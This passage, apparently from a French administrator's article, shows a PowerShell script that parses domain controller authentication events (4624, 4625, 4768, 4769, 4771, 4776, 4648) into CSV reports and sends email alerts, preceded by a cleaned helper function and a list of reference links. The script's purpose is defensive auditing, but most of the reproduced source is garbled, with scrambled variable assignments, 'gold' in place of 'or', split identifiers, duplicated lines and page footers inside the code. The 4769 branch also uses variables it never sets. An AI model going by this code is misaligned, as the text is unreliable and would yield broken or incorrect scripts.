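    # 4776 carries PackageName / Workstation where 4624 carries AuthenticationPackageName / IpAddress
    $AuthPackage = if ($Data.ContainsKey('AuthenticationPackageName')) { $Data['AuthenticationPackageName'] } else { $Data['PackageName'] }
    $Source      = if ($Data.ContainsKey('IpAddress')) { $Data['IpAddress'] } else { $Data['Workstation'] }
    [pscustomobject]@{
        DC = $Xml.Event.System.Computer; Status = $Status; Date = $Xml.Event.System.TimeCreated.SystemTime
        EventId = [int]$Xml.Event.System.EventID
        User = [string]$Data['TargetUserName']; Domain = [string]$Data['TargetDomainName']
        LogonProcessName = [string]$Data['LogonProcessName']; AuthenticationPackageName = [string]$AuthPackage
        LmPackageName = [string]$Data['LmPackageName']; IpAddress = [string]$Source
    }
}

# Write lines in blocks of $BlockSize (the script's $EcritureNbLigne) and start a new
# file once the current one exceeds $MaxFileBytes (the script's $MaxResultatSize).
function Write-ResultBlocks {
    param([string[]]$Lines, [string]$BasePath, [string]$Header, [int]$BlockSize = 10000, [long]$MaxFileBytes = 104857600)
    $Index  = 1
    $Buffer = New-Object System.Collections.Generic.List[string]
    $Path   = "$BasePath-$Index.csv"
    $Header | Out-File -FilePath $Path -Encoding UTF8
    foreach ($Line in $Lines) {
        $Buffer.Add($Line)
        if ($Buffer.Count -ge $BlockSize) {
            $Buffer | Out-File -FilePath $Path -Append -Encoding UTF8   # one I/O per block, not per line
            $Buffer.Clear()
            if ((Get-Item $Path).Length -gt $MaxFileBytes) {
                $Index++
                $Path = "$BasePath-$Index.csv"
                $Header | Out-File -FilePath $Path -Encoding UTF8
            }
        }
    }
    if ($Buffer.Count -gt 0) { $Buffer | Out-File -FilePath $Path -Append -Encoding UTF8 }
    return $Index   # number of files written
}

# Same header as the common result file of the document's script
$Header = 'DC;Status;Date;EventId;User;Domain;ServiceName;LogonProcessName;AuthenticationPackageName;LmPackageName;IpAddress'
$Rows = $SampleEvents | ForEach-Object { ConvertFrom-SecurityEventXml $_ } |
    Where-Object { -not $_.User.EndsWith('$') } |   # exclude computer accounts, as the script does
    ForEach-Object { "$($_.DC);$($_.Status);$($_.Date);$($_.EventId);$($_.User);$($_.Domain);;$($_.LogonProcessName);$($_.AuthenticationPackageName);$($_.LmPackageName);$($_.IpAddress)" }

$Base  = Join-Path $env:TEMP 'DC1-AuditConnexion'
$Files = Write-ResultBlocks -Lines $Rows -BasePath $Base -Header $Header -BlockSize 2 -MaxFileBytes 1MB
"Files written: $Files"
Get-Content "$Base-1.csv"   # header plus the two user rows; the PC042$ logon is filtered out
```

To apply it to a real export, replace $SampleEvents with the output of the wevtutil command shown above (one XML event per line) and keep the default block size of 10,000 lines; the size check runs only after a block is flushed, so a file can exceed the limit by at most one block.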

This script was written using the following articles:
https://blogs.msdn.microsoft.com/monad/2005/11/30/using-culture-culture-culture-script-scriptblock/
https://blogs.technet.microsoft.com/heyscriptingguy/2011/03/08/how-to-improve-the-performance-of-a-powershell-event-log-query/
https://gist.github.com/gravejester/b16bab17b80619f2b964
https://communary.net/2015/12/13/observations-on-writing-to-screen-and-file-in-powershell/
http://ss64.com/ps/zip.txt
http://stackoverflow.com/questions/14827716/adding-a-complete-directory-to-an-existing-zip-file-with-system-io-compression-f
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4768
http://my-powershell.fr/aide-memoire-powershell
http://www.ehow.com/how_7719350_split-string-two-variables-powershell.html
http://technet.microsoft.com/fr-FR/library/dd772712(WS.10).aspx
https://social.technet.microsoft.com/Forums/windows/en-US/6f158957-28ea-4ce9-a688-ccfa7bbd16bd/wevtutil-command-options-for-date?forum=w7itprogeneral

Script source code:

# ------------------------------------------ #
# Script Parameters
# ------------------------------------------ #

param (
[STRING] $ DC
[STRING] $ DossierAuditConnexion [STRING] $
EventName
)

echo "The script must be run with 3 settings (Required)" echo "Do not forget the \ at the end of the road for DossierAuditConnexion
parameter!" echo "Example: AuditConnexion.ps1 -DC DC1 -DossierAuditConnexion D: \ _ adm \ AuditConnexion \ EventName DC1.evtx"

# ------------------------------------------ #
# variables
# ------------------------------------------ #

# Location of the event log


$ = $ EventFile DossierAuditConnexion + "Events \" $ + DC + "\" + $ EventName

# Reference date: recovering the date of the last event. DateReference = $ (Get-WinEvent -Path $ EventFile |
-First select 1) .timeCreated

# It retrieves the events of the last 24 hours + 1 minutes DateDebutTemp $ = (Get-Date -Date $ DateReference) .AddMinutes
(-1441) $ StartDate = "" + (Get-Date $ -Date DateDebutTemp -Format 'yyyy-MM -ddTHH: mm: ss') + ""

# One term analuse the date of the last log


$ EndDate = "" + (Get-Date $ -Date DateReference -Format 'yyyy-MM-DDThh: mm: ss') + "'"

# Temporary Working Folder


$ = $ DossierTravail DossierAuditConnexion + "Work \" + $ EventName + "\"

# record results
$ = $ DossierResultats DossierAuditConnexion + "Results \" + $ EventName + "\"

# files results

Msreport - Guillaume MATHIEU - All rights reserved This script was


Result = $ $ $ DossierTravail + DC + "- AuditConnection -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $
DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

$ Resultat4624 DossierTravail = $ + $ + DC "- AuditConnection_ID4624 -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $


DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

$ Resultat4625 DossierTravail = $ + $ + DC "- AuditConnection_ID4625 -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $


DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

$ Resultat4768 DossierTravail = $ + $ + DC "- AuditConnection_ID4768 -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $


DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

$ Resultat4769 DossierTravail = $ + $ + DC "- AuditConnection_ID4769 -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $


DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

$ Resultat4771 DossierTravail = $ + $ + DC "- AuditConnection_ID4771 -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $


DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

$ Resultat4776 DossierTravail = $ + $ + DC "- AuditConnection_ID4776 -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $


DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

$ Resultat4648 DossierTravail = $ + $ + DC "- AuditConnection_ID4648 -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" + $


DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".csv"

# Result file in ZIP format


$ ResultatZip DossierResultats = $ + $ + DC "- AuditConnection -" + $ DateReference.Year + "-" + $ DateReference.Month + "-" +
$ DateReference.Day + "_" + $ DateReference.Hour + "-" + $ DateReference.Minute + "-" + $ + DateReference.Second ".zip"

# Link to file $ result = ResultatZipLink "\\ serveurrapport \ results $ \ "+ $ EventName +" \ "+ $ + DC" - AuditConnection - "+ $
DateReference.Year +" - "+ $ DateReference.Month +" - "+ $ DateReference.Day + '_' + + $ DateReference.Hour "-" + $
DateReference.Minute + "-" + $ + DateReference.Second ".zip"

# Maximum size of output file in the file in bytes work MaxResultatSize $ = 104857600

# $ MaxResultatSize = 24857600

# Index for naming files results in the work folder (set to 1) $ Index = 1 $ = 1 Index4776 Index4768 $ 1 = $ 1 =
Index4769 Index4771 $ 1 = $ 1 = Index4624 Index4625 $ 1 = $ 1 = Index4648

# Maximum size of the zip file in bytes


# $ MaxResultatZipSize = 1097150 $
MaxResultatZipSize = 199715000

# Sender of the email $ From = " $DC@msreport.fr


"

# Recipient's email (@ $ To = ( " guillaume.mathieu@metsys.fr ") $ @ To = (" guillaume.mathieu@metsys.fr


")

# Mail server

Msreport - Guillaume MATHIEU - All rights reserved


$ SMTPServer = " srvexch.msreport.fr "

# Title of email
$ Title = "Audit successful authentication requests and failures on $ DC"

# Number of events to be analyzed before writing the results files


# This parameter determines the memory requirements of PowerShell to run the script $ EcritureNbLigne = 10000

# ------------------------------------------------------------------------------- #
# Prerequisite check and creation of output files
# The EVTX file must exist.
# The working folder and the results of file are created if necessary.
# If the script sends an email and stops.
# ------------------------------------------------------------------------------- #

if ((Test-Path $ EventFile) True -do $) {

# Send an alert $ format = "<style>"

$ = $ + Format Format "</ style>" $ Body =


"<P> Hello </ P>"
$ $ Body = Body + "<P> An error occurred while generating the report on authentication requests to the domain controller $ DC. Files or
missing work files. </ P>" $ Body $ = Body + "<P> Regards </ P>"

$ $ Body = Body + "<P> The IT team Msreport </ P>" $ ratio = ConvertTo-Html Title -Title -Body
$ $ $ Body -head Format
Send-MailMessage $ -To To -subject "Audit successful authentication requests and failed on $ CD" -Body "$ Report" -SmtpServer $
SMTPServer -From From $ -BodyAsHtml -Encoding ([System.Text.Encoding] :: UTF8)

# Stopping the Exit}


else {script

# Deleting the working folder if it exists. The file is recreated vacuo. Remove-Item $ DossierTravail
-Recurse -Force: $ True New-Item -Path $ DossierTravail -itemtype Directory -Force

# Removing the output file if it already exists (it restarts the job for the same event log). if ((Test-Path $ ResultatZip) -eq $ True) {

Remove-Item $ ResultatZip -Force}

# Creating the domain controller Results folder if it does not exist. if ((Test-Path $ DossierResultats)
True -do $) {

New-Item $ -Path DossierResultats -itemtype Directory -Force}}

# ----------------------------------------------------------------- #
# Creation results files with headers
# Creating result tables (stored in memory lines)
# ----------------------------------------------------------------- #

# common result file to all ID

Msreport - Guillaume MATHIEU - All rights reserved


"DC; Status; Date; EventId; User; Domain; ServiceName; LogonProcessName; AuthenticationPackageNam e; LmPackageName; Ip Address" |
Out-File $ Result = $ TableResultat New-Object System.Collections.Generic.List [string]

# Result file with the ID 4776


"DC; Status; Date; EventId; PackageName; TargetUserName; Workstation; StatusDetail" | Out-File $ Resultat4776

$ TableResultat4776 = New-Object System.Collections.Generic.List [string]

# File result for ID 4624


"DC; Status; Date; EventId; SubjectUserSid; SubjectUserName; SubjectDomainName; SubjectLogonId; Tar getUserSid; TargetUserName;
TargetDomainName; TargetLogonId; LogonType; LogonProcessName; Aut henticationPackageName; WorkstationName; LogonGuid;
LmPackageName; keyLength; ProcessId; KEYL ength; ProcessName; IpAddress; ipport "| Out-File $ Resultat4624 $ TableResultat4624 =
New-Object System.Collections.Generic.List [string]

# File result for ID 4625


"DC; Status; Date; EventId; SubjectUserSid; SubjectUserName; SubjectDomainName; SubjectLogonId; Tar getUserSid; TargetUserName;
TargetDomainName; StatusCode; FailureReason; SUBSTATUS; LogonType; LogonProcessName; AuthenticationPackageName;
WorkstationName; TransmittedServices; LmPackag eName; keyLength; ProcessId; ProcessName; IpAddress ; ipport "| Out-File $
Resultat4625 $ TableResultat4625 = New-Object System.Collections.Generic.List [string]

# File result for ID 4768


"DC; Status; Date; EventId; TargetUserName; TargetDomainName; TargetSid; ServiceName; ServiceSid; Ti cketOptions; Status;
TicketEncryptionType; PreAuthType; IpAddress; ipport; CertIssuerName; CertSerialN umber; CertThumbprint" | Out-File $ Resultat4768

$ TableResultat4768 = New-Object System.Collections.Generic.List [string]

# File result for ID 4769


"DC; Status; Date; EventId; TargetUserName; TargetDomainName; ServiceName; ServiceSid; TicketOptio ns; TicketEncryptionType;
IpAddress; ipport; LogonGuid; TransmittedServices" | Out-File $ Resultat4769 $ TableResultat4769 = New-Object
System.Collections.Generic.List [string]

# File result for ID 4771


"DC; Status; Date; EventId; TargetUserName; TargetSid; ServiceName; TicketOptions; PreAuthType; IpAdd ress; ipport; CertIssuerName;
CertSerialNumber; CertThumbprint" | Out-File $ Resultat4771 $ TableResultat4771 = New-Object System.Collections.Generic.List [string]

# File result for ID 4648


"DC; Status; Date; EventId; SubjectUserSid; SubjectUserName; SubjectDomainName; SubjectLogonId; Lo gonGuid; TargetUserName;
TargetDomainName; TargetLogonGuid; targetServerName; TargetInfo; Proc Essid; ProcessName; IpAddress; ipport" | Out-File $
Resultat4648 $ TableResultat4648 = New-Object System.Collections.Generic.List [string]

# ------------------------------------------------- #
# Generate $ Result file
# ------------------------------------------------- #
wevtutil qe / lf: $ EventFile True "/ q * [System [(EventID = 4624 = 4625 gold EventID EventID = 4768 gold gold gold EventID = 4769 =
EventID EventID = 4771 gold 4776 gold EventID = 4648) and TimeCreated [@SystemTime > = $ StartDate and @SystemTime <= $
EndDate]]] "| {foreach
# Create the XML variable with the contents of the log. [XML] $ XML = ($ _)

# Event ID 4776 Analysis: if ($ xml.Event.System.EventID


-eq "4776") {

$ = $ DCEvent XML.Event.System.Computer Status = $ $ $ Date = $


XML.Event.System.Keywords xml.Event.System.TimeCreated.SystemTime

Msreport - Guillaume MATHIEU - All rights reserved


$ = $ EventId xml.Event.System.EventID
PackageName $ = $ XML.Event.EventData.Data [0]. '# Text' $ TargetUserName =
$ XML.Event.EventData.Data. [1] '# text' $ = $ XML.Event.EventData.Data
Workstation [ 2]. '# text' $ StatusDetail = $ XML.Event.EventData.Data. [3] '# text'

If (! ($ TargetUserName.Contains ( "$"))) {

if ($ Status -eq "0x8020000000000000") {

$ Status = "Success Audit"}

# Writing the common result file to all ID


$ TableResultat.Add ( "$ DCEvent; $ status, $ Date, $ EventId; TargetUserName ;;;; $ $ $ PackageName ;; Work Station")

# Writing the specific file for the ID 4776


$ TableResultat4776.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ PackageName; $ TargetUserName; $ Wo rkstation; $ StatusDetail")}}

# Event ID 4624 Analysis elseif ($ xml.Event.System.EventID


-eq 4624) {

$ = $ DCEvent XML.Event.System.Computer $ Status = $


XML.Event.System.Keywords
if ($ Status -eq "0x8020000000000000") {$ Status = "Success Audit"} = $ $ Date $
xml.Event.System.TimeCreated.SystemTime EventId = $ xml.Event.System.EventID

$ = $ SubjectUserSid XML.Event.EventData.Data [0]. '# Text' $ SubjectUserName = $


XML.Event.EventData.Data. [1] '# text' $ SubjectDomainName = $ XML.Event.EventData.Data [ 2]. '#
text' $ SubjectLogonId = $ XML.Event.EventData.Data. [3] '# text' $ TargetUserSid = $
XML.Event.EventData.Data. [4] '# text' $ = $ TargetUserName XML .Event.EventData.Data. [5] '#
text' $ TargetDomainName = $ XML.Event.EventData.Data. [6] '# text' $ TargetLogonId = $
XML.Event.EventData.Data [7]. '# text '= $ LogonType $ XML.Event.EventData.Data. [8]' # text '$
LogonProcessName = $ XML.Event.EventData.Data. [9]' # text '$ AuthenticationPackageName = $
XML.Event.EventData. Data [10]. '# text' $ WorkstationName = $ XML.Event.EventData.Data. [11] '#
text' $ LogonGuid = $ XML.Event.EventData.Data. [12] '# text' = $ TransmittedServices $
XML.Event.EventData.Data. [13] '# text' $ LmPackageName = $ XML.Event.EventData.Data. [14] '#
text' $ keyLength = $ XML.Event.EventData.Data. [15] '# text 'ProcessId $ = $
XML.Event.EventData.Data. [16]' # text '$ ProcessName = $ XML.Event.EventData.Data. [17]' # text
'$ IpAddress = $ XML.Event.EventData.Data [18]. '# text' $ ipport = $ XML.Event.EventData.Data.
[19] '# text'

# Exclude entries whose user name is the name of a computer account. If (! ($ TargetUserName.Contains (
"$"))) {

# Writing the common result file to all ID


$ TableResultat.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ TargetUserName; $ TargetDomainName ;; L $ ogonProcessName; $
AuthenticationPackageName; $ LmPackageName; $ IpAddress")

# Writing the output file for the ID 4624

Msreport - Guillaume MATHIEU - All rights reserved


$ TableResultat4624.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ SubjectUserSid; $ SubjectUserName; S $ ubjectDomainName; $
SubjectLogonId; $ TargetUserSid; $ TargetUserName; $ TargetDomainName; $ Targ etLogonId; $ LogonType; $ LogonProcessName; $
AuthenticationPackageName; $ WorkstationName; $ Log onGuid; $ LmPackageName; $ keyLength; $ ProcessId; $ keyLength; $
ProcessName; $ IpAddress; $ ipport ")}}

# Event ID 4625 Analysis elseif ($ xml.Event.System.EventID


-eq 4625) {

$ = $ DCEvent XML.Event.System.Computer $ Status = $


XML.Event.System.Keywords
if ($ Status -eq "0x8010000000000000") {$ status = "Audit Failure"} = $ $ Date $
xml.Event.System.TimeCreated.SystemTime EventId = $ xml.Event.System.EventID

$ = $ SubjectUserSid XML.Event.EventData.Data [0]. '# Text' $ SubjectUserName = $


XML.Event.EventData.Data. [1] '# text' $ SubjectDomainName = $ XML.Event.EventData.Data [ 2]. '#
text' $ SubjectLogonId = $ XML.Event.EventData.Data. [3] '# text' $ TargetUserSid = $
XML.Event.EventData.Data. [4] '# text' $ = $ TargetUserName XML .Event.EventData.Data. [5] '# text' $
TargetDomainName = $ XML.Event.EventData.Data. [6] '# text' $ StatusCode = $
XML.Event.EventData.Data [7]. '# text '= $ FailureReason $ XML.Event.EventData.Data. [8]' # text '$
sUBSTATUS = $ XML.Event.EventData.Data. [9]' # text '$ LogonType = $ XML.Event.EventData. Data
[10]. '# text' $ LogonProcessName = $ XML.Event.EventData.Data. [11] '# text' $
AuthenticationPackageName = $ XML.Event.EventData.Data. [12] '# text' = $ WorkstationName $
XML.Event.EventData.Data. [13] '# text' $ TransmittedServices = $ XML.Event.EventData.Data. [14] '#
text' $ LmPackageName = $ XML.Event.EventData.Data. [15] '# text' $ keyLength = $
XML.Event.EventData.Data. [16] '# text' $ ProcessId = $ XML.Event.EventData.Data. [17] '# text' $
ProcessName = $ XML.Event.EventData.Data [18 ]. '# text' $ IpAddress = $ XML.Event.EventData.Data.
[19] '# text' $ ipport = $ XML.Event.EventData.Data. [20] '# text'#text 'ipport $ = $
XML.Event.EventData.Data. [20]' # text '#text 'ipport $ = $ XML.Event.EventData.Data. [20]' # text '

# Exclude entries whose user name is the name of a computer account. If (! ($ TargetUserName.Contains (
"$"))) {

# Writing the common result file to all ID


$ TableResultat.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ TargetUserName; $ TargetDomainName ;; L $ ogonProcessName; $
AuthenticationPackageName; $ LmPackageName; $ IpAddress")

# Writing the output file for the ID 4625


$ TableResultat4625.Add ( "$ DCEvent; $ status, $ Date, $ EventId; $ SubjectUserSid; $ SubjectUserName; S $ ubjectDomainName; $
SubjectLogonId; $ TargetUserSid; $ TargetUserName; $ TargetDomainName; $ Status sCode; $ FailureReason; $ SUBSTATUS; $
LogonType; $ LogonProcessName; $ AuthenticationPackageName; $ WorkstationName; $ TransmittedServices; $ LmPackageName; $
keyLength; $ ProcessId; ProcessNam $ e, $ IpAddress; $ ipport ")}}

# Analysis of the 4768 events (Kerberos authentication)
elseif ($xml.Event.System.EventID -eq 4768) {
    $DCEvent = $xml.Event.System.Computer
    $Status = $xml.Event.EventData.Data[6].'#text'
    $Date = $xml.Event.System.TimeCreated.SystemTime
    $EventId = $xml.Event.System.EventID
    $TargetUserName = $xml.Event.EventData.Data[0].'#text'
    $TargetDomainName = $xml.Event.EventData.Data[1].'#text'
    $TargetSid = $xml.Event.EventData.Data[2].'#text'
    $ServiceName = $xml.Event.EventData.Data[3].'#text'
    $ServiceSid = $xml.Event.EventData.Data[4].'#text'
    $TicketOptions = $xml.Event.EventData.Data[5].'#text'
    $TicketEncryptionType = $xml.Event.EventData.Data[7].'#text'
    $PreAuthType = $xml.Event.EventData.Data[8].'#text'
    $IpAddress = $xml.Event.EventData.Data[9].'#text'
    $IpPort = $xml.Event.EventData.Data[10].'#text'
    $CertIssuerName = $xml.Event.EventData.Data[11].'#text'
    $CertSerialNumber = $xml.Event.EventData.Data[12].'#text'
    $CertThumbprint = $xml.Event.EventData.Data[13].'#text'

    # Exclude entries whose user name is the name of a computer account
    if (!($TargetUserName.Contains('$'))) {

        # Analyze the error code / status (Kerberos result codes of the 4768 event)
        if ($Status -eq "0x0") { $Status = "Success - 0x0" }
        elseif ($Status -eq "0x1") { $Status = "Failure - 0x1 - Client's entry in database has expired" }
        elseif ($Status -eq "0x2") { $Status = "Failure - 0x2 - Server's entry in database has expired" }
        elseif ($Status -eq "0x3") { $Status = "Failure - 0x3 - Requested protocol version not supported" }
        elseif ($Status -eq "0x4") { $Status = "Failure - 0x4 - Client's key encrypted in old master key" }
        elseif ($Status -eq "0x5") { $Status = "Failure - 0x5 - Server's key encrypted in old master key" }
        elseif ($Status -eq "0x6") { $Status = "Failure - 0x6 - Client not found in Kerberos database" }
        elseif ($Status -eq "0x7") { $Status = "Failure - 0x7 - Server not found in Kerberos database" }
        elseif ($Status -eq "0x8") { $Status = "Failure - 0x8 - Multiple principal entries in database" }
        elseif ($Status -eq "0x9") { $Status = "Failure - 0x9 - The client or server has a null key" }
        elseif ($Status -eq "0xA") { $Status = "Failure - 0xA - Ticket not eligible for postdating" }
        elseif ($Status -eq "0xB") { $Status = "Failure - 0xB - Requested start time is later than end time" }
        elseif ($Status -eq "0xC") { $Status = "Failure - 0xC - KDC policy rejects request (could be workstation restrictions)" }
        elseif ($Status -eq "0xD") { $Status = "Failure - 0xD - KDC cannot accommodate requested option" }
        elseif ($Status -eq "0xE") { $Status = "Failure - 0xE - KDC has no support for encryption type" }
        elseif ($Status -eq "0xF") { $Status = "Failure - 0xF - KDC has no support for checksum type" }
        elseif ($Status -eq "0x10") { $Status = "Failure - 0x10 - KDC has no support for padata type" }
        elseif ($Status -eq "0x11") { $Status = "Failure - 0x11 - KDC has no support for transited type" }
        elseif ($Status -eq "0x12") { $Status = "Failure - 0x12 - Client's credentials have been revoked (account could be disabled, expired, locked)" }
        elseif ($Status -eq "0x13") { $Status = "Failure - 0x13 - Credentials for server have been revoked" }
        elseif ($Status -eq "0x14") { $Status = "Failure - 0x14 - TGT has been revoked" }
        elseif ($Status -eq "0x15") { $Status = "Failure - 0x15 - Client not yet valid - try again later" }
        elseif ($Status -eq "0x16") { $Status = "Failure - 0x16 - Server not yet valid - try again later" }
        elseif ($Status -eq "0x17") { $Status = "Failure - 0x17 - Password has expired" }
        elseif ($Status -eq "0x18") { $Status = "Failure - 0x18 - Pre-authentication information was invalid (could be a bad password)" }
        elseif ($Status -eq "0x19") { $Status = "Failure - 0x19 - Additional pre-authentication required" }
        elseif ($Status -eq "0x1F") { $Status = "Failure - 0x1F - Integrity check on decrypted field failed" }
        elseif ($Status -eq "0x20") { $Status = "Failure - 0x20 - Ticket expired (frequently logged by computer accounts)" }
        elseif ($Status -eq "0x21") { $Status = "Failure - 0x21 - Ticket not yet valid" }
        elseif ($Status -eq "0x22") { $Status = "Failure - 0x22 - Request is a replay" }
        elseif ($Status -eq "0x23") { $Status = "Failure - 0x23 - The ticket is not for us" }
        elseif ($Status -eq "0x24") { $Status = "Failure - 0x24 - Ticket and authenticator do not match" }
        elseif ($Status -eq "0x25") { $Status = "Failure - 0x25 - Clock skew too great (workstation clock too far out of sync with the DC's)" }
        elseif ($Status -eq "0x26") { $Status = "Failure - 0x26 - Incorrect net address" }
        elseif ($Status -eq "0x27") { $Status = "Failure - 0x27 - Protocol version mismatch" }
        elseif ($Status -eq "0x28") { $Status = "Failure - 0x28 - Invalid msg type" }
        elseif ($Status -eq "0x29") { $Status = "Failure - 0x29 - Message stream modified" }
        elseif ($Status -eq "0x2A") { $Status = "Failure - 0x2A - Message out of order" }
        elseif ($Status -eq "0x2C") { $Status = "Failure - 0x2C - Specified version of key is not available" }
        elseif ($Status -eq "0x2D") { $Status = "Failure - 0x2D - Service key not available" }
        elseif ($Status -eq "0x2E") { $Status = "Failure - 0x2E - Mutual authentication failed" }
        elseif ($Status -eq "0x2F") { $Status = "Failure - 0x2F - Incorrect message direction" }
        elseif ($Status -eq "0x30") { $Status = "Failure - 0x30 - Alternative authentication method required" }
        elseif ($Status -eq "0x31") { $Status = "Failure - 0x31 - Incorrect sequence number in message" }
        elseif ($Status -eq "0x32") { $Status = "Failure - 0x32 - Inappropriate type of checksum in message" }
        elseif ($Status -eq "0x3C") { $Status = "Failure - 0x3C - Generic error (description in e-text)" }
        elseif ($Status -eq "0x3D") { $Status = "Failure - 0x3D - Field is too long for this implementation" }
        else { $Status = "Failure - other error" }

        # Writing the common result file for all event IDs
        $TableResultat.Add("$DCEvent;$Status;$Date;$EventId;$TargetUserName;$TargetDomainName;$ServiceName;Kerberos;;;$IpAddress")

        # Writing the result file for event ID 4768
        $TableResultat4768.Add("$DCEvent;$Status;$Date;$EventId;$TargetUserName;$TargetDomainName;$TargetSid;$ServiceName;$ServiceSid;$TicketOptions;$Status;$TicketEncryptionType;$PreAuthType;$IpAddress;$IpPort;$CertIssuerName;$CertSerialNumber;$CertThumbprint")
    }
}

# Analysis of the 4769 events (Kerberos authentication)
elseif ($xml.Event.System.EventID -eq 4769) {
    # Exclude entries whose user name is the name of a computer account
    if (!($TargetUserName.Contains('$'))) {
        # Writing the result file for event ID 4769
        $TableResultat4769.Add("$DCEvent;$Status;$Date;$EventId;$TargetUserName;$TargetDomainName;$ServiceName;$ServiceSid;$TicketOptions;$TicketEncryptionType;$IpAddress;$IpPort;$LogonGuid;$TransmittedServices")
    }
}

# Analysis of the 4771 events (Kerberos pre-authentication failure)
elseif ($xml.Event.System.EventID -eq 4771) {
    $DCEvent = $xml.Event.System.Computer
    $Status = $xml.Event.EventData.Data[4].'#text'
    $Date = $xml.Event.System.TimeCreated.SystemTime
    $EventId = $xml.Event.System.EventID
    $TargetUserName = $xml.Event.EventData.Data[0].'#text'
    $TargetSid = $xml.Event.EventData.Data[1].'#text'
    $ServiceName = $xml.Event.EventData.Data[2].'#text'
    $TicketOptions = $xml.Event.EventData.Data[3].'#text'
    $PreAuthType = $xml.Event.EventData.Data[5].'#text'
    $IpAddress = $xml.Event.EventData.Data[6].'#text'
    $IpPort = $xml.Event.EventData.Data[7].'#text'
    $CertIssuerName = $xml.Event.EventData.Data[8].'#text'
    $CertSerialNumber = $xml.Event.EventData.Data[9].'#text'
    $CertThumbprint = $xml.Event.EventData.Data[10].'#text'

    # Exclude computer account authentication events
    if (!($TargetUserName.Contains('$'))) {

        # Analyze the error code / status (same Kerberos result codes as for 4768)
        if ($Status -eq "0x0") { $Status = "Success - 0x0" }
        elseif ($Status -eq "0x1") { $Status = "Failure - 0x1 - Client's entry in database has expired" }
        elseif ($Status -eq "0x2") { $Status = "Failure - 0x2 - Server's entry in database has expired" }
        elseif ($Status -eq "0x3") { $Status = "Failure - 0x3 - Requested protocol version not supported" }
        elseif ($Status -eq "0x4") { $Status = "Failure - 0x4 - Client's key encrypted in old master key" }
        elseif ($Status -eq "0x5") { $Status = "Failure - 0x5 - Server's key encrypted in old master key" }
        elseif ($Status -eq "0x6") { $Status = "Failure - 0x6 - Client not found in Kerberos database" }
        elseif ($Status -eq "0x7") { $Status = "Failure - 0x7 - Server not found in Kerberos database" }
        elseif ($Status -eq "0x8") { $Status = "Failure - 0x8 - Multiple principal entries in database" }
        elseif ($Status -eq "0x9") { $Status = "Failure - 0x9 - The client or server has a null key" }
        elseif ($Status -eq "0xA") { $Status = "Failure - 0xA - Ticket not eligible for postdating" }
        elseif ($Status -eq "0xB") { $Status = "Failure - 0xB - Requested start time is later than end time" }
        elseif ($Status -eq "0xC") { $Status = "Failure - 0xC - KDC policy rejects request (could be workstation restrictions)" }
        elseif ($Status -eq "0xD") { $Status = "Failure - 0xD - KDC cannot accommodate requested option" }
        elseif ($Status -eq "0xE") { $Status = "Failure - 0xE - KDC has no support for encryption type" }
        elseif ($Status -eq "0xF") { $Status = "Failure - 0xF - KDC has no support for checksum type" }
        elseif ($Status -eq "0x10") { $Status = "Failure - 0x10 - KDC has no support for padata type" }
        elseif ($Status -eq "0x11") { $Status = "Failure - 0x11 - KDC has no support for transited type" }
        elseif ($Status -eq "0x12") { $Status = "Failure - 0x12 - Client's credentials have been revoked (account could be disabled, expired, locked)" }
        elseif ($Status -eq "0x13") { $Status = "Failure - 0x13 - Credentials for server have been revoked" }
        elseif ($Status -eq "0x14") { $Status = "Failure - 0x14 - TGT has been revoked" }
        elseif ($Status -eq "0x15") { $Status = "Failure - 0x15 - Client not yet valid - try again later" }
        elseif ($Status -eq "0x16") { $Status = "Failure - 0x16 - Server not yet valid - try again later" }
        elseif ($Status -eq "0x17") { $Status = "Failure - 0x17 - Password has expired" }
        elseif ($Status -eq "0x18") { $Status = "Failure - 0x18 - Pre-authentication information was invalid (could be a bad password)" }
        elseif ($Status -eq "0x19") { $Status = "Failure - 0x19 - Additional pre-authentication required" }
        elseif ($Status -eq "0x1F") { $Status = "Failure - 0x1F - Integrity check on decrypted field failed" }
        elseif ($Status -eq "0x20") { $Status = "Failure - 0x20 - Ticket expired (frequently logged by computer accounts)" }
        elseif ($Status -eq "0x21") { $Status = "Failure - 0x21 - Ticket not yet valid" }
        elseif ($Status -eq "0x22") { $Status = "Failure - 0x22 - Request is a replay" }
        elseif ($Status -eq "0x23") { $Status = "Failure - 0x23 - The ticket is not for us" }
        elseif ($Status -eq "0x24") { $Status = "Failure - 0x24 - Ticket and authenticator do not match" }
        elseif ($Status -eq "0x25") { $Status = "Failure - 0x25 - Clock skew too great (workstation clock too far out of sync with the DC's)" }
        elseif ($Status -eq "0x26") { $Status = "Failure - 0x26 - Incorrect net address" }
        elseif ($Status -eq "0x27") { $Status = "Failure - 0x27 - Protocol version mismatch" }
        elseif ($Status -eq "0x28") { $Status = "Failure - 0x28 - Invalid msg type" }
        elseif ($Status -eq "0x29") { $Status = "Failure - 0x29 - Message stream modified" }
        elseif ($Status -eq "0x2A") { $Status = "Failure - 0x2A - Message out of order" }
        elseif ($Status -eq "0x2C") { $Status = "Failure - 0x2C - Specified version of key is not available" }
